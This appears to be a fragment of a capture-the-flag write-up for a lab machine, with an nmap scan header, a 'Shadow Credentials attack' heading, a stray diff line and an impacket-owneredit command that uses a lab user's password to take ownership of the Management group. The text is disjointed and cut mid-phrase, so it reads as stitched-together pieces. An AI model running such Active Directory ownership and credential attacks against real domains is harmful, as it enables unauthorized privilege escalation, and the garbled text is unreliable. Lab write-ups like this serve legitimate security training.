Nmap 7.94SVN scan initiated Tue Mar 18 13:17:25 2025 as: /usr/lib/nmap/nmap --privileged -n -Pn -v -sC -sV -oN nmap.txt 10.10.11.41

 - Shadow Credentials attack

-group as stuff gets cleaned up)
+(redo addition of judith.mader to the Management group as stuff gets cleaned up)

 $ impacket-owneredit -action write -new-owner judith.mader -target management certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41